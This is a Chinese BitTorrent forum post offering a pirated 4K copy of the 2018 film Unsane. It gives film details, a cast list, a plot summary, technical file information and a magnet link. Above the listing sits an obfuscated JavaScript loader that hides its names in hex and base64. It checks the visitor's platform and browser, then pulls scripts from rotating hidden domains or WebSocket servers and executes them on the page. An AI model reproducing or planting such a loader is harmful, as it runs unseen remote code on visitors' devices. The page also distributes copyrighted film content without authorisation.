失心病狂[中文字幕].Unsane.2018.2160p.HDR.UHD.BluRay.4K迅雷下载 14.90GB

版主小s 1月前 176

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 失心病狂 / 疯人院(台) / 疯·魔(港) / 荒诞 / 表演者

◎片 名 Unsane

◎年 代 2018

◎产 地 美国

◎类 别 剧情 / 惊悚 / 恐怖

◎语 言 英语

◎上映日期 2018-02-21(柏林电影节) / 2018-03-23(美国)

◎IMDb链接 https://www.imdb.com/title/tt7153766/

◎豆瓣评分 6.5/10 (4361人评价)

◎豆瓣链接 https://movie.douban.com/subject/27092551/

◎片 长 98分钟

◎导 演 史蒂文·索德伯格 Steven Soderbergh (id:1054400)

◎编 剧 乔纳森·伯恩斯坦 Jonathan Bernstein (id:1390305)

詹姆斯·格里尔 James Greer (id:1390307)

◎演 员 乔舒华·莱纳德 Joshua Leonard (id:1018113)

克莱尔·芙伊 Claire Foy (id:1274511)

莎拉·斯蒂尔斯 Sarah Stiles (id:1390626)

马克·库迪奇 Marc Kudisch (id:1109360)

艾米·欧文 Amy Irving (id:1049684)

科林·伍德尔 Colin Woodell (id:1340880)

迈拉·卢克利希亚·泰勒 Myra Lucretia Taylor (id:1160487)

琳达·茂泽 Lynda Mauze (id:1390627)

扎克·切利 Zach Cherry (id:1390628)

波莉·麦基 Polly McKie (id:1390629)

杰·费罗尔 Jay Pharoah (id:1316693)

劳尔·卡斯提洛 Raúl Castillo (id:1338121)

朱诺·坦普尔 Juno Temple (id:1274500)

迈克尔·米姆 Michael Mihm (id:1194008)

罗伯特·凯利 Robert Kelly (id:1390630)

吉普森·弗雷泽 Gibson Frazier (id:1051071)

埃林·维赫米 Erin Wilhelmi (id:1325940)

艾米·穆林斯 Aimee Mullins (id:1348980)

约瑟夫·莱迪 Joseph P. Reidy (id:1295409)

马特·达蒙 Matt Damon (id:1054443)

阿诺恩·米尔坎 Arnon Milchan (id:1037087)

史蒂文·索德伯格 Steven Soderbergh (id:1054400)

史蒂文·索德伯格 Steven Soderbergh (id:1054400)

◎标 签 惊悚 / 美国 / 悬疑 / 恐怖 / 2018 / 剧情 / 手机拍摄 / 史蒂文·索德伯格

◎简 介

《失心病狂》讲述了一个年轻女孩,一个年轻女人为了摆脱混乱的过去离开了家乡,无意中被送进了精神病院。在面对如何“逃出去”的自我命题之下,对她而言,似乎还潜藏着更大的恐惧—她似乎正在失去判断这一切到底是真实的存在还是自己的臆想的能力……影片以一种扭曲的视角和惊人的故事向我们问出了关于我们对于现实的认知,我们的生存本能以及本该保护我们的系统的问题。

◎获奖情况 (共1项)

第39届伦敦影评人协会奖 (2019)

年度英国/爱尔兰女演员(提名)

└──克莱尔·芙伊 (id:1274511)

  1. General

  2. Unique ID : 85325725411361565379347256230027195070 (0x4031230FC94D7FBA2FB3BEAA75FBF2BE)

  3. Complete name : Unsane.2018.2160p.HDR.UHD.BluRay.DTS-HD.MA.5.1.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 14.9 GiB

  7. Duration : 1 h 38 min

  8. Overall bit rate : 21.7 Mb/s

  9. Movie name : Unsane 2018 2160p HDR UHD BluRay DTS-HD MA 5.1 x265-10bit-HDS

  10. Encoded date : UTC 2021-06-27 10:09:05

  11. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  12. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. HDR format : SMPTE ST 2086, HDR10 compatible

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 38 min

  21. Bit rate : 20.2 Mb/s

  22. Width : 3 840 pixels

  23. Height : 2 160 pixels

  24. Display aspect ratio : 16:9

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.101

  31. Stream size : 13.8 GiB (93%)

  32. Title : [email protected]

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No

  36. Color range : Limited

  37. Color primaries : BT.2020

  38. Transfer characteristics : PQ

  39. Matrix coefficients : BT.2020 non-constant

  40. Mastering display color primaries : Display P3

  41. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  42. Maximum Content Light Level : 739 cd/m2

  43. Maximum Frame-Average Light Level : 331 cd/m2


  44. Audio

  45. ID : 2

  46. Format : DTS

  47. Format/Info : Digital Theater Systems

  48. Codec ID : A_DTS

  49. Duration : 1 h 38 min

  50. Bit rate mode : Constant

  51. Bit rate : 1 509 kb/s

  52. Channel(s) : 6 channels

  53. Channel layout : C L R Ls Rs LFE

  54. Sampling rate : 48.0 kHz

  55. Frame rate : 93.750 FPS (512 SPF)

  56. Bit depth : 24 bits

  57. Compression mode : Lossy

  58. Stream size : 1.03 GiB (7%)

  59. Title : English

  60. Language : English

  61. Default : Yes

  62. Forced : No


  63. Text #1

  64. ID : 3

  65. Format : PGS

  66. Muxing mode : zlib

  67. Codec ID : S_HDMV/PGS

  68. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  69. Duration : 1 h 35 min

  70. Bit rate : 32.2 kb/s

  71. Count of elements : 1720

  72. Stream size : 22.0 MiB (0%)

  73. Title : CHS

  74. Language : Chinese

  75. Default : Yes

  76. Forced : No


  77. Text #2

  78. ID : 4

  79. Format : PGS

  80. Muxing mode : zlib

  81. Codec ID : S_HDMV/PGS

  82. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  83. Duration : 1 h 35 min

  84. Bit rate : 32.7 kb/s

  85. Count of elements : 1720

  86. Stream size : 22.3 MiB (0%)

  87. Title : CHT

  88. Language : Chinese

  89. Default : No

  90. Forced : No


  91. Menu

  92. 00:00:00.000 : en:Chapter 01

  93. 00:05:40.257 : en:Chapter 02

  94. 00:10:21.913 : en:Chapter 03

  95. 00:14:24.697 : en:Chapter 04

  96. 00:19:26.332 : en:Chapter 05

  97. 00:24:46.235 : en:Chapter 06

  98. 00:29:10.165 : en:Chapter 07

  99. 00:36:35.402 : en:Chapter 08

  100. 00:40:25.089 : en:Chapter 09

  101. 00:45:23.596 : en:Chapter 10

  102. 00:50:14.803 : en:Chapter 11

  103. 00:56:12.286 : en:Chapter 12

  104. 00:59:06.835 : en:Chapter 13

  105. 01:04:44.464 : en:Chapter 14

  106. 01:07:30.046 : en:Chapter 15

  107. 01:15:37.450 : en:Chapter 16

  108. 01:23:25.334 : en:Chapter 17

  109. 01:26:39.653 : en:Chapter 18

  110. 01:30:23.168 : en:Chapter 19

  111. 01:35:08.411 : en:Chapter 20


TAGS 剧情 惊悚 恐怖

磁力链:
  • magnet:?xt=urn:btih:5ECE98EFCB9475966694DB64738FE16838F73DCB
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回